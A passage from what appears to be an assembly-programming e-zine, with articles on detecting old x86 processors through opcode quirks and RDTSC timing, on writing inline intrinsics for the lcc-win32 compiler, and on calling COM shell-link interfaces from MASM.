function. Instead, control flows to the next "pat.alternate" or
"pat.if_failure" clause. Some calls to HLA pattern matching routines may
even
cause the program to back up in the code and reexecute previously called
functions in an attempt to match a difficult pattern (i.e., the backtracking
component). This article is not the place to get into the theory of pattern
matching; however, these few examples should be sufficient to show you that
something really special is going on here. And all these facilities were
developed using the HLA compile-time language. This should give you a small
indication of what is possible when using the HLA compile time language
facilities.
The HLA language is far too rich to describe in this short article (the
*very*
rough documentation for the language is nearly 300 pages long). For more
information, check out the on-line documentation for HLA at
http://webster.cs.ucr.edu. Someday, you'll also be able to learn about HLA
via "The Art of Assembly Language Programming, HLA/Windows version." I will
keep interested individuals updated on the progress of AoA at the Webster
web
site.
HLA is totally free. It is public domain software and there are no
restrictions on its use, the use of the HLA standard library, or the HLA
compiler source code. Do whatever you want with it and have a lot of fun!
rhyde@...http://webster.cs.ucr.eduhttp://www.cs.ucr.edu/docs/webster/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Processor Identification - Part
II
by Chris Dragan & Chili
In the first part of this article I'll explain a lot of different ways to
check
for older processors by exploiting bugs, undocumented features, etc. I'll
also
show how to write an invalid-opcode exception handler, calculate the size
of
the prefetch queue and some other things. Finally, in the last part Chris
shows
how to determine the processor clockrate with the RDTSC instruction.
Chris didn't have much free time at the moment and so couldn't contribute
more,
therefore I had to put this article together pretty much myself, and I hope
the
quality didn't go down very much -- since Chris' texts are definitely
better
than mine.
AAD (ASCII Adjust before Division) Instruction
----------------------------------------------
This instruction allows us to distinguish between at least NEC's V-series
and
Intel processors. AAD, usually in preparation for a division using DIV or
IDIV,
works like this:
AL = AH * 10 + AL
AH = 0
Converting the unpacked two-digit BCD number in AX into binary. Thus
being
"0d5h, 0ah" the normal opcode. The difference is that while Intel's chips
allow
one to replace the multiplicand with any number (and by so building your
own
AAD instruction for various number systems), NEC always encodes it as 10
by
default. So by replacing the second byte with a different number, we can
then
check if the operand is actually used, and if not, assume it's a NEC.
mov ax, 0f0fh
db 0d5h, 10h ; opcode for AAD 16
cmp al, 0ffh ; check if multiplicand was 10 or
not
jz _is_Intel
jnz _is_NEC
This should be used as another way (in addition to the one presented in
the
first article on this subject) to distinguish the NEC V20/V30 series from
the
Intel 8086/88.
PUSHA Instruction
-----------------
Here is another good way to differentiate NECs from Intel's 8086/88.
Since
V20 and V30 execute all the 80186 instructions and knowing that PUSHA
executed
on the 8086/88 as "JMP $+2", one can for example, after executing it, set
the
carry flag and then see if it was really set.
clc ; ensure that CF is clear
pusha ; executed on 8086/88 as JMP $+2
stc
jc _is_NEC_or_186plus
jnc _is_808x
<whatever code here>
.
.
.
_is_NEC_or_186plus:
popa ; clean up
Of course the carry flag must not already be set before performing this
test.
POP CS Trick
------------
I'll just show one last way of accomplishing the same. The trick is that,
on a
8086/88 (non-CMOS versions, at least), the opcode "0fh" will perform a POP
CS,
on a 186/88 is an invalid opcode, generating an INT6 exception, while NECs
and
286+ use that encoding as a prefix byte, to indicate new instructions. So,
to
tell NEC's V20/V30 (also V40/V50, I think) and 8086/88 apart, and knowing
that
with the byte string "0fh, 14h, 0c3h", the CPU will perform the following:
8086/88 V20/V30
------- -------
pop cs set1 bl, cl
adc al, 0C3h
It is then easy to write a piece of code that will distinguish between them:
xor al, al ; BTW: clears CF
push cs
db 0fh, 14h, 0c3h ; intruction(s) -- see above
cmp al, 0c3h ; check if ADC was executed
je _is_808x
jne _is_NEC_V20plus
<whatever code here>
.
.
.
_is_NEC_V20plus:
pop ax ; clean up (no POP CS available)
Note that, again, the carry flag must be cleared before execution of this
test.
Also, just a reminder that this is to be used when you know that the
processor
is not a 186 or above but an older one.
Word Write
----------
On the 8086/88 (+ V20/V30), when a word write is performed at offset 0ffffh
in
a segment, one byte will be written at that offset and the other at offset
0,
while an 80186 family processor will write one byte at offset 0ffffh, and
the
other, one byte beyond the end of the segment (offset 10000h). So all we
have
to do is test if it wraps around or not:
mov ax, ds:[0ffffh] ; save original bytes
mov word ptr ds:[0ffffh], 0aaaah
cmp byte ptr ds:[0], 0aah ; did 2nd byte wrap around?
mov ds:[0ffffh], ax ; restore original bytes
je _is_808x
jne _is_8018x
Again, note that this should only be used for the specified processors.
Multi-Prefix Intructions
------------------------
The standard 8086/88 processors have a bug such that they loose
multiple
prefixes if an interrupt occurs, while CMOS versions do not, since this bug
was
fixed in the 80C86/C88 processors (NEC V20/V30 processors also do not have
this
bug -- allowing the following code to also be applicable to them). If
we
execute a string operation with a repeat prefix and also a segment override
for
long enough to be interrupted, then, if we are on a 8086/88 the REP prefix
will
be lost when the instruction is interrupted, since on return, only the
last
prefix will be retained. If instead, we are on a low-power consumption
CMOS
version, the code will successfully complete.
mov cx, 0ffffh
sti
rep lods byte ptr es:[si] ; sure to be interrupted
cli
jcxz _not_standard_808x ; check if REP was completed
<if here, then it's just a standard 8086/88>
.
.
.
Just in case you want to use a piece of code like this without having to
worry
about that bug, here's how to get it work correctly every time (with
interrupts
enabled -- this time with MOVS):
do_REP: rep movs byte ptr es:[di], es:[si] ; may be
interrupted!
jcxz carry_on ; if not, carry on,
loop do_REP ; else, complete REP
carry_on:
Invalid-Opcode Exception Handler (INT6)
---------------------------------------
From the 80186 and upwards, all processors allow one to implement
an
invalid-opcode exception handler, which gives us a great way of telling
the
families of CPUs apart. All one does is, hook the INT6 interrupt vector
with
our own handler and see if some specific instructions trigger an INT6 or
not.
With our handler we trap those exceptions and then toggle a little flag,
that
show us the processor doesn't support that instruction.
In the code below I hooked the INT6 vector by changing the IVT
(Interrupt
Vector Table) directly, but one can also use DOS services for that, test
which
processor we're running on and after that restore things back to what they
were
before (except registers, place some push/pop code yourself according to
your
needs -- by the way, Robert Collins is a god!). Anyway, the code is pretty
much
self-explanatory:
; Hook INT6 -- set up our own handler
push 0 ; point to IVT (0000:0000) -
(1
pop es ; byte saved thanks to
Chris!)
cli
lds ax, es:[6*4] ; get original handler
vector
mov es:[6*4], offset INT6_handler ; then, replace it
with
mov es:[6*4+2], cs ; our own handler
sti
; Test if processor is at least a 80186 -- Executes "SHL DX, 10"?
mov cx, 1 ; set up invalid-opcode flag
shl dx, 0ah
jcxz unknown_CPU
; Test if processor is at least a 80286 -- Executes "SMSW DX"?
smsw dx
jcxz _is_80186
; Test if processor is at least a 80386 -- Executes "MOV EDX, EDX"?
mov edx, edx
jcxz _is_80286
; Test if processor is at least a 80486 -- Executes "XADD DL, DL"?
xadd dl, dl
jcxz _is_80386
<if here, then it's a 80486 or higher processor>
.
.
.
; Restore original INT6 handler address -- for all processors type!
cli
mov es:[6*4], ax ; restore original INT6 offset
mov es:[6*4+2], ds ; restore original INT6 segment
sti
<whatever code here>
.
.
.
; Our own INT6 handler
INT6_handler:
xor cx, cx ; toggle invalid-opcode flag
push bp
mov bp, sp
add word ptr ss:[bp+2], 3 ; adjust the return address
to
; after the invalid opcode
(3
; bytes for all)
pop bp
iret
Note, that for this code: 1) should only be used if you know the processor
is
at least a 80186, 2) if you fiddle with the contents of AX, ES and DS
and
change them before restoring the original INT6 handler don't forget to
first
save and then restore them!, 3) of course the code in the INT6_handler
should
only be executed by means of an INT6!
Maybe a very small extra explanation is required regarding the INT6_handler.
We
need to adjust the return address, since when an invalid opcode exception
is
issued the saved contents of CS and EIP (which are pushed onto the stack)
point
to the instruction that generated the exception, instead of the next one
(as
usually happens for other interrupts).
Instruction Prefetch Queue
--------------------------
16-bit (ie. 8086s, 80186s, V30s) processors have a prefetch queue 6 bytes
in
size and replenish the instruction queue after having at least two bytes
empty
in the queue, while their 8-bit bus versions (ie. 8088s, 80188, V20s) only
have
a 4 byte prefetch queue and initiate the prefetch cycle when there is at
least
one empty byte in it.
So, knowing this about their Bus Interface Unit design, it isn't difficult
to
write some code to distinguish between the two categories. We'll make a
routine
that uses self-modifying code to change the opcode at the fifth byte and
then
see if it was executed or not.
xor cx, cx
cli ; prevent against queue being
emptied
lea di, patch
mov al, 90h ; load NOP opcode
stosb ; patch fifth byte to a NOP
nop
nop
nop
nop
patch: inc cx ; did the INC execute?
sti
jcxz _is_8bit
<if here, then it's an 16-bit processor>
I believe there is enough time for the prefetch queue to fill, though I have
no
chance to confirm it!
Just in case you want to be on the safe side, here's a routine that will
most
certainly work:
xor dx, dx
cli ; prevent against queue being
emptied
lea di, patch+2
mov al, 90h ; load NOP opcode
mov cx, 3
std
rep stosb ; patch fifth byte to a NOP
nop
nop
nop
nop
patch: inc dx ; did the INC execute?
nop
nop
sti
test dx, dx
jz _is_8bit
<if here, then it's an 16-bit processor>
Again, I must stress that this code should only be used for the
specified
processors, since it will without a doubt fail on others.
Do It The Optimized Way!
------------------------
Here is our size-optimized way of determining the processor type. It's
an
algorithm that uses Intel's guidelines and tests between pre-80286,
80286,
80386, 80486 without CPUID and 80486+ with CPUID support.
Chris is using a similar routine in his CPU identification utility.
; Detection of pre-80286/80286/386+ processors
mov ax, 7202h ; set bits 12-14 and clear bit 15
push ax
popf
pushf
pop ax
test ah, 0f0h
js _is_pre286 ; bit 15 of FLAGS is set on pre-286
jz _is_80286 ; bits 12..15 of FLAGS are clear on
286
; processor in real mode (no V86
mode
; on 286)
; <if here, then it's a 80386 or higher processor>
; Detection of 80386/80486(w/out CPUID)/80486+(CPUID compliant)
pushfd
pop eax
mov edx, eax
xor eax, 00240000h ; flip bits 18 (AC) and 21 (ID)
push eax
popfd
pushfd
pop eax
xor eax, edx ; check if both bits didn't toggle
jz _is_80386
shr eax, 19 ; check if only bit 18 toggled
jz _is_80486_without_CPUID
<if here, then it's a 80486 with CPUID or higher processor>
And so, we got the whole code down to a measly 46 bytes!
CR0 Register - Bit 4
--------------------
The 80386 DX may be differentiated from the other models by trying to clear
bit
4 (ET) in the CR0 register. It can be toggled on the 80386 DX, while it
is
hardwired to 1 on any of the other family models. So this gives us a good
way
to differentiate them, by trying to clear that bit and then see if it
got
forced to set or not.
; Test CR0 register -- bit 4 (ET)
mov eax, cr0
mov edx, eax ; save original CR0
and al, 11101111b ; clear bit 4
mov cr0, eax
mov eax, cr0
mov cr0, edx ; restore original CR0
test al, 00010000b ; check if bit 4 was forced high
jz _is_a_80386DX_model
jnz _is_not_a_80386DX_and_therefore_is_some_other_model
Note that I'm not sure if this can safelly/trustfully be done under
protected
mode!
Clockrate
---------
Before Pentium, it was difficult to determine the processor clockrate.
It
typically based on sophisticated timing loops, which were often
unreliable.
With Pentium, Intel introduced RDTSC instruction, which returned number
of
clocks since the processor start. The following code illustrates how to use
it.
; Determine RDTSC support (assuming that CPUID is supported)
mov eax, 1
cpuid
test edx, 10h ; bit 4 is set when RDTSC is
supported
jz _no_rdtsc
; Disable all interrupts but timer IRQ0
in al, 21h
mov ah, al
in al, 0A1h
push ax ; Save previous values
mov al, 0FEh
out 21h, al
mov al, 0FFh
out 0A1h, al
; Assuming that timer runs at 55ms periods, get the clockrate
hlt ; Wait for timer
rdtsc ; Read TSC
mov ebx, eax ; Save lo
mov ecx, edx ; Save hi
hlt ; Wait for timer
rdtsc ; Read TSC
sub eax, ebx ; Difference lo
sbb edx, ecx ; Difference hi
; Calculate clockrate in MHz
mov ecx, 54925
div ecx
mov [Clockrate], eax
; Restore interrupt states
pop ax
out 0A1h, al
mov al, ah
out 21h, al
The above code can be run in real mode, V86 mode or protected mode in ring0.
In
V86 mode it will hang Pentium and Pentium MMX processors, but on
other
processors it will work OK.
In this code, clockrate is determined as: (T2-T1)*PIT/(D*M), where T1 and
T2
are numbers of clocks returned by RDTSC, PIT is the value divided in
the
Programmable Interval Timer (equals 0x1234DD), D is the value by which PIT
is
divided (0x10000) and M is 1000000 (we want it in MHz).
Is This The End?
----------------
I think this is the end as old CPUs are concerned, since a lot of
techniques
have already been covered here (though there are some more), but not for
other
processors, like AMD and IBM and whatever else Chris and I think up before
the
next article.
Take the time to visit Chris' web page, where you can find the source for
his
CPU identification utility (for Netwide Assembler). His place is at:
http://ams.ampr.org/cdragan/
Also, here are some other sources of information that you might want to
take a
look at (available somewhere on the net -- since I don't remember where I
got
them from):
WHATCHIP.ASM (Christy Gemmell)
86BUGS.LST (Harald Feldmann/Hamarsoft)
[distributed with Ralf Brown's Interrupt list]
OPCODES.LST (Potemkin's Hackers Group)
[distributed with Ralf Brown's Interrupt list]
cpu.asm (Robert Mashlan)
WHATCPU.ASM (Dave M. Walker)
COMPTEST 2.60 (Norbert Juffa)
Ralf Brown's Interrupt List:
http://www.cs.cmu.edu/~ralf/files.html
This, in addition to the ones already referenced in the first article of
this
series.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
The LCC Intrinsics
Utility
Jacob
Navia
Lcc-win32 is a free C compiler system. It features an IDE, a resource
compiler,
a linker, librarian, a windowed debugger, and other goodies.
Here, I would like to describe a special feature of lcc-win32 that will be
surely appreciated by the colleagues that use assembly.
Lcc-win32 understands special macro definitions called intrinsics.This
constructs will be seen as normal function calls by the front end of the
compiler, but will be inline expanded by the back-end.
You can add your own intrinsic macros to the system, allowing you to use the
power and speed of assembly language within the context of a more powerful
and
safer high level language.
I will present here two examples, to give you an idea of how this can look
like.
You will need the source code of lcc-win32, that can be obtained at the home
page: http://ps.qss.cz/lcc or ftp://ftp.cs.virginia.edu/pub/lcc-win32
Inlining the strlen function
----------------------------
Lets assume the strlen function of the C library is just to slow for you.
Instead of generating:
pushl Arg
call _strlen
addl $4,%esp
you would like to generate inline the following code:
; Inlined strlen. The input argument is in ECX and points to the
; character string
orl $-1,%eax
loop:
inc %eax
cmpb $0,(%ecx,%eax)
jnz loop
This function then, should be inlined by the compiler. The C interface would
be:
_strlen(str);
The prototype must be:
extern _stdcall _strlen(char *);
The compiler recognizes intrinsic macros because they have an underscore as
the
first character of their names, they are declared _stdcall, and they appear
in
the intrinsics table. Functions that begin with an underscore are few, and
this
avoids looking up the intrinsics table for each function call, what would
slow
down compilation speed.
You take then the file intrin.c, in the sources of lcc-win32 and modify the
intrinsics table. Its declaration is in the middle of the file, and looks
like
this:
static INTRINSICS intrinsicTable[] = {
{"_fsincos",2, 0, fsincos, NULL },
{"_bswap", 1, 0, bswap, bswapArgs },
... many declarations omitted ...
{"_reduceLtb",3, 0, redCmpLtb, paddArgs },
{"_mmxDotProduct",3,0, mmxDotProd, paddArgs },
{"_emms",0, 0, emms, NULL },
{NULL, 0, 0, 0, 0 }
};
You add before the last line, the following line:
{"_strlen",1, 0, strlenGen, strlenArgs },
telling the system that you want an intrinsic called _strlen, that takes one
argument, whose code will be generated by the function strlenGen(), and the
arguments assigned to their respective registers in the function
strlenArgs().
This functions should assign the registers in which you want the arguments
to
the inline macro, and generate the code for the body of the macro.
Basically,
this macros are seen as special calls by the compiler, that instead of
generating a push instruction, will call your <arguments> function, that
should
set the right fields in each node passed to it, to make later the code
generator
generate a move to the registers specified.
Note that all intrinsics should start with an underscore to avoid
conflicting
with user space names.
When a call to this function is detected by the compiler, you will first be
called when pushing the arguments at each call site. Here is the function
strlenArgs() then:
static Symbol strlenArgs(Node p)
{
Symbol r=NULL;
//The global ArgumentsIndex is zero before each call. The compiler
//takes care of that.
switch (ArgumentsIndex) {
case 0: // First argument pushed, from right to left!
if (p->x.nestedCall == 0) {
Symbol w;
r = SetRegister(p,intreg[ECX]);
}
break;
}
// We have seen another argument
ArgumentsIndex++;
// Assign the register to this expression.
if (p->x.nestedCall == 0 && r)
p->syms[2] = r;
// Should never be more than one arguments
if (ArgumentsIndex == 1)
ArgumentsIndex = 0;
return r;
}
You see that in several places we have the test:
if (p->x.nestedCall == 0)
This means that we should check if we have a nested call sequence within the
arguments, i.e. the following C expression:
strlen( SomeFunction() );
True, in the case of strlen this doesnt change anything important, the
result
of the function will be in EAX anyway. But suppose you defined a macro that
takes two arguments, say, some special form of addition sadd(a,b).
In this case we would assign the second argument (from left to right) to
ECX,
and the first to EAX. Consider then the case of:
sadd( SomeFunction(),5);
If we would just assign 5 to ECX, then the call to SomeFunction(), would
destroy the contents of ECX during the call!
This means that when the compiler detects a call within argument passing,
all
arguments WILL BE in the stack, and our code generating function should take
care of popping them into the right registers before proceeding.
In the case of strlen this can really hardly happen, but its important to
see
how this would work in the general case.
Note too that the argument function should increase the global argument
counter
for each argument, and reset it to zero when its done. Again, this is not
necessary for strlen, but for macros that take more arguments this should be
done imperatively.
The SetRegister function takes care of the details of assigning a register.
Here is its short body:
Symbol SetRegister(Node p,Symbol r)
{
Symbol w;
w = p->kids[0]->syms[2];
if (w->x.regnode == NULL || w->x.regnode->vbl == NULL)
p->kids[0]->syms[2] = r;
return r;
}
This function tests that in the given node, the left child isn't already
assigned to a register. It will assign the register only if this is not the
case. Otherwise, the compiler will generate the move.
We come now to the center of the routine: Generating code for the strlen
utility.
static Symbol strlenGen(Node p)
{
static int labelCount;
// OK, the first thing to do is to see if we should pop our arguments.
// If that is the case, pop them into the right registers.
if (p->x.nestedCall) {
print("\tpopl\t%%ecx\n");
}
/*
Here we generate the code for the strlen routine. Note that the % sign is
used
by the assembler of lcc-win32 to mark a register keyword, but our print()
function uses it too to mark (as printf) the beginning of an argument. We
must
double them to get around this collision.
1) Set the counter to minus one
*/
print("\torl\t$-1,%%eax\n");
/*
2) We should generate the label for this instance. All labels must be
unique,
and the easiest way to ensure that we always generate a new label is to
number
them consecutively using a counter. To avoid colliding with other labels, we
use a unique prefix too.
*/
print("_$strlen%d:\n",labelCount);
/*
3) Now we generate the code for the body of the loop searching for the
character zero.
*/
print("\tinc\t%%eax\n");
/* 4) Note the dollar before the immediate constant.*/
print("\tcmpb\t$0,(%%ecx,%%eax)\n");
/*
5) We generate the jump, incrementing our loop counter afterwards
*/
print("\tjnz\t_$strlen%d\n",labelCount++);
/*
Now we are done, the result is in eax, as it should. We finish our function.
Note that no pops are needed, since the ones we did at the beginning
(eventually) are just to compensate for the pushs the compiler generated.
Note too that we shouldn't insert a return statement since this is a macro
that shouldn't cause the current function to return!
*/
}
We compile the compiler, and we obtain a new compiler that will recognize
the
macro we have just created. Compiling the compiler with itself is a good
test
for your new function of course. This should be done at least three times to
be sure that your function is working OK.
Register assignments
--------------------
In general, you can use ECX, EDX, and EAX as you wish. The contents of EBX,
ESI, EBP and EDI should always be saved. If you destroy them unpredictable
results will surely occur.
Lets write a test function for our new compiler:
#include <stdio.h>
#ifdef MACRO
int _stdcall _strlen(char *);
#define strlen _strlen
#else
int strlen(char *);
#endif
int main(int argc, char *argv[])
{
if (argc > 1)
printf("Length of \"%s\" is %d\n", argv[1],
strlen(argv[1]));
return 0;
}
In the C source, we use the conditional MACRO to signify if we should use
our
macro, or just generate a call to the normal strlen procedure for comparison
purposes. We compile this with our new compiler, and add the S parameter to
see
what is generating.
lcc -S DMACRO tstrlen.c
The assembly (that the compiler writes in tstrlen.asm) is then:
_main:
pushl %ebp
movl %esp,%ebp
pushl %edi
.line 9
.line 10
cmpl $1,8(%ebp)
jle _$2
.line 11
movl 12(%ebp),%edi
; Our argument gets assigned to ECX, as our strlenArgs function
; defined
movl 4(%edi),%ecx
; Here is the begin of our macro body
orl $-1,%eax
; This is our generated label
_$strlen0:
inc %eax
cmpb $0,(%ecx,%eax)
jnz _$strlen0
; Our macro ends here, leaving its results in EAX
pushl %eax
movl 12(%ebp),%edi
pushl 4(%edi)
pushl $_$4
call _printf
addl $12,%esp
_$2:
.line 12
xor %eax,%eax
.line 13
popl %edi
popl %ebp
ret
We see that there is absolutely no call overhead. The arguments are assigned
to
the right registers in our function strlenArgs, and the body is expanded
in-line by strlenGen.
Next, we link our executable:
D:\lcc\src74\test>lcclnk tstrlen.obj
And we run a test:
D:\lcc\src74\test>tstrlen abcde
The length of "abcde" is 5
D:\lcc\src74\test>
Here is the strlenGen() function again for clarity.
static void strlenGen(Node p)
{
static int labelCount;
if (p->x.nestedCall) {
print("\tpopl\t%%ecx\n");
}
print("\torl\t$-1,%%eax\n");
print("_$strlen%d:\n",labelCount);
print("\tinc\t%%eax\n");
print("\tcmpb\t$0,(%%ecx,%%eax)\n");
print("\tjnz\t_$strlen%d\n",labelCount++);
}
Another example: inlining the strchr function
---------------------------------------------
To demonstrate a function with two arguments, we inline the strchr function.
This function should return a pointer to the first occurrence of the given
character in a string, or NULL, if the character doesnt appear in the
string.
The implementation could be like this :
_strchr:
movb (%eax),%dl // read a character
cmpb %cl,%dl // compare it to searched for char
je _strchrexit // exit if found with pointer to char as
result
incl %eax // move pointer to next char
orb %dl,%dl // test for end of string
jne strchr // if not zero continue loop
xorl %eax,%eax // Not found. Zero result
strchrexit :
We just scan the characters looking for either zero (end of the string) or
the
given char. The pointer to the string will be in EAX, and the character to
be
searched for will be in ECX. We use EDX as a scratch register.
The next step is then, to write the strchr function for assigning the
arguments.
Here it is :
static Symbol strchrArgs(Node p)
{
Symbol r=NULL;
switch (ArgumentsIndex) {
case 0: // First argument (from right to left) char to be searched.
// We put it in ECX
if (p->x.nestedCall == 0) {
r = SetRegister(p,intreg[ECX]);
}
break;
case 1: // Second argument: pointer to the string. We put it in EAX
if (p->x.nestedCall == 0) {
r = SetRegister(p,intreg[EAX]);
}
break;
}
ArgumentsIndex++;
if (p->x.nestedCall == 0)
p->syms[2] = r;
if (ArgumentsIndex == 2)
ArgumentsIndex = 0;
return r;
}
The next step is finally to write the generating function. Here it is; note
that we need two labels:
static void strchrGen(Node p)
{
static int labelCount;
if (p->x.nestedCall) {
print("\tpopl\t%%ecx\n");
}
print("_$strchr%d:\n",labelCount);
print("\tmovb\t(%%eax),%%dl\n");
print("\tcmpb\t%%cl,%%dl\n");
print("\tje\t_$strchr%d\n",labelCount+1);
print("\tinc\t%%eax\n");
print("\torb\t%%dl,%%dl\n");
print("\tjne\t_$strchr%d\n",labelCount);
print("\txorl\t%%eax,%%eax\n");
print("_$strchr%d:\n",labelCount+1);
labelCount += 2;
}
This facility is not very common in a compiler system, and it allows you to
use assembly language in the routines that are *really* needed in a software
system, leaving to the compiler the tedious work of generating the assembly
for you in the 90% of the code where speed is not so important after all.
Another benefit is that you can't do simple mistakes when passing arguments
to your assembler macros since they are understood as function calls by the
compiler, and all prototype checking is done by the front end. If you
attempt
to use the strchr macro like this:
strchr('\n",string);
the compiler will issue an error.
The lcc-win32 system can be downloaded free of charge from
http://ps.qss.cz/lcc
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Accessing COM Objects from
Assembly
by Ernest Murphy
Abstract
--------
The COM (Component Object Model) is used by the Windows Operation system in
increasing ways. For example, the shell.dll uses COM to access some of its
API
methods. The IShellLink and IPersistFile interfaces of the shell32.dll will
be
demonstrated to create a shortcut shell link. A basic understanding of COM
is
assumed. The code sample included is MASM specific.
Introduction
------------
COM may seem complicated with its numerous details, but in use these
complications disappear into simple function calls. The hardest part is
understanding the data structures involved so you can define the
interfaces.
I apologize for all the C++ terminology used in here. While COM is
implementation neutral, it borrows much terminology from C++ to define
itself.
In order to use the COM methods of some object, you must first instance or
create that object from its coclass, then ask it to return you a pointer to
it's interface. This process is performed by the API function
CoCreateInstance.
When you are done with the interface you call it's Release method, and COM
and
the coclass will take care of unloading the coclass.
Assessing COM Methods
---------------------
To use COM methods you need to know before hand what the interface looks
like. Even if you "late bind" through an IDispatch interface, you still need
to know what IDispatch looks like.
An COM interface is just table of pointers to functions. Let's start with
the IUnknown interface. If you were to create a component that simply
exports
the IUnknown interface, you have a fully functional COM object (albeit on
the
level of "Hello World"). IUnknown has the 3 basic methods of every
interface,
since all interfaces inherit from IUnknown. Keep in mind all an interface
consists of is a structure of function pointers. For IUnknown, it looks like
this:
IUnknown STRUCT DWORD
; IUnknown methods
QueryInterface IUnknown_QueryInterface
?
AddRef IUnknown_AddRef
?
Release IUnknown_Release
?
IUnknown ENDS
That's it, just 12 bytes long. It holds 3 DWORD pointers to the procedures
that actually implement the methods. It is the infamous "vtable" you may
have
heard of. The pointers are defined as such so we can have MASM do some type
checking for us when compiling our calls.
Since the vtable holds the addresses of functions, or pointers, these
pointers
are typedefed in our interface definition as such:
IUnknown_QueryInterface typedef ptr
IUnknown_QueryInterfaceProto
IUnknown_AddRef typedef ptr IUnknown_AddRefProto
IUnknown_Release typedef ptr IUnknown_ReleaseProto
Finally, we define the function prototypes as follows:
IUnknown_QueryInterfaceProto typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto typedef PROTO :DWORD
IUnknown_ReleaseProto typedef PROTO :DWORD
In keeping with the MASM32 practice of "loose" type checking, function
parameters are just defined as DWORDs. Lots of work to set things up, but it
does keeps lots of errors confined to compile time, not run time. In
practice,
you can wrap up your interface definitions in include files and keep them
from cluttering up your source code.
One rather big compilation on defining an interface: MASM cannot resolve
forward references like this, so we have to define them backwards, by
defining
the function prototype typedefs first, and the interface table last. The
sample
program later on defines the interfaces this way.
To actually use an interface, you need a pointer to it. The
CoCreateInstance
API can be used to return us this indirect pointer to an interface
structure.
It is one level removed from the vtable itself, and actually points to the
"object" that holds the interface. (This would be clearer had I been
creating
the interface instead of using one. Please wait for a future article for
that).
The place this pointer points to in the object points to the interface
structure. Thus, this pointer is generically named "ppv", for "pointer to
pointer to (void)," where (void) means an unspecified type.
For example, say we used CoCreateInstance and successfully got an
interface
pointer ppv, and wanted to see if it supports some other interface. We can
call
its QueryInterface method and request a new ppv to the other interface we
are
interested in. Such a call would look like this:
mov eax, ppv ; get pointer to the object
mov edx, [eax] ; and use it to find the interface structure
; and then call that method
invoke (IUnknown PTR [edx]).QueryInterface, ppv,
ADDR IID_SomeOtherInterface, ADDR ppv_new
I hope you find this as wonderfully simple as I do. IID_SomeOtherInterface
holds the GUID of the interface we desire, and ppv_new is a new pointer we
can
use to access it. Also note we must pass in the pointer we used, this lets
the
interface know which object (literally "this" object) we are using.
Incidentally, in a previous APJ article on COM, there was an error in how
a
COM interface is invoked. THIS was left out of the COM call. The program
seemed
to work, because the COM invoke was invoked from the main code, not from a
procedure, and did not require a return call before calling ExitProcess. Had
this COM invoke been done from a procedure, a stack error crash would have
resulted.
Note the register must be type cast (IUnknown PTR [edx]). This lets
the compiler know what structure to use to get the correct offset in the
vtable
for the .QueryInterface function (in this case it means an offset of zero
from
edx). Actually, the information contained by the interface name and function
name called disappear at compile time, all that is left is a numeric offset
from an as of yet value unspecified pointer.
We can simplify a COM invoke further with a macro:
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
LOCAL istatement, arg
;; invokes an arbitrary COM interface
;; pInterface pointer to a specific interface instance
;; Interface the Interface's struct typedef
;; Function which function or method of the interface to
perform
;; args all required arguments
;; (type, kind and count determined by the
function)
istatement TEXTEQU <invoke (Interface PTR[eax]).&Function,
pInterface>
FOR arg, <args>
; build the list of parameter arguments
istatement CATSTR istatement, <, >, <&arg>
ENDM
mov eax, pInterface
mov eax, [eax]
istatement
ENDM
Thus, the same QueryInterface method as before can be invoked in a single
line:
coinvoke ppv ,IUnknown, QueryInterface,
ADDR IID_SomeOtherInterface, ADDR ppnew
The return parameter for every COM call is an hResult, a 4 byte return
value
in eax. It is used to signal success or failure. Since the most significant
digit is used to indicate failure, you can test the result with a simple:
.IF !SIGN?
; function passed
.ELSE
; function failed
.ENDIF
Again, this can be simplified with some more simple macros:
SUCCEEDED TEXTEQU <!!SIGN?>
FAILED TEXTEQU <!!SUCCEEDED>
(The not ! sign must be doubled since that symbol has special meaning in
MASM macros)
That's about all you need to fully invoke and use interfaces from COM
objects
from assembly. These techniques work with any COM or activeX object.
Back to the Real Word: Using IShellFile and IPersistFile from shell32.dll
-------------------------------------------------------------------------
The shell32.dll provides a simple, easy way to make shell links (shortcuts).
However, it uses a COM interface to provide this service. The sample below
is
based on the MSDN "Shell Links" section for "Internet Tools and
Technologies."
This may be a strange place to find documentation, but there it is.
The "Shell Links" article may be found at
http://msdn.microsoft.com/library/psdk/shellcc/shell/Shortcut.htm
For this tutorial we will access the following members of the IShellLink and
the IPersistFile interfaces. Note every interface includes a "ppi" interface
parameter, this is the interface that we calling to (it is the THIS
parameter).
(The following interface information is a copy of information published
by Microsoft)
IShellLink::QueryInterface, ppi, ADDR riid, ADDR ppv
* riid: The identifier of the interface requested. To get access to the
* ppv: The pointer to the variable that receives the interface.
Description: Checks if the object also supports the requested interface. If
so,
assigns the ppv pointer with the interface's pointer.
IShellLink::Release, ppi
Description: Decrements the reference count on the IShellLink interface.
IShellLink:: SetPath, ppi, ADDR szFile
* pszFile: A pointer to a text buffer containing the new path for the shell
link object.
Description: Defines where the file the shell link points to.
IShellLink::SetIconLocation, ppi, ADDR szIconPath, iIcon
* pszIconPath: A pointer to a text buffer containing the new icon path.
* iIcon: An index to the icon. This index is zero based.
Description: Sets which icon the shelllink will use.
IPersistFile::Save, ppi, ADDR szFileName, fRemember
* pszFileName: Points to a zero-terminated string containing the absolute
path
of the file to which the object should be saved.
* fRemember: Indicates whether the pszFileName parameter is to be used as
the
current working file. If TRUE, pszFileName becomes the current file and the
object should clear its dirty flag after the save. If FALSE, this save
operation is a "Save A Copy As ..." operation. In this case, the current
file
is unchanged and the object should not clear its dirty flag. If pszFileName
is
NULL, the implementation should ignore the fRemember flag.
Description: Perform a save operation for the ShellLink object, or saves the
shell link are creating.
IPersistFile::Release, ppi
Description: Decrements the reference count on the IPersistFile interface.
These interfaces contain many many more methods (see the full interface
definitions in the code below), but we only need concentrate on those we
will
actually be using.
A shell link is the MS-speak name for a shortcut icon. The information
contained in a link (.lnk) file is:
1 - The file path and name of the program to shell.
2 - Where to obtain the icon to display for the shortcut (usually from
the
executable itself), and which icon in that file to use. We will
use
the first icon in the file
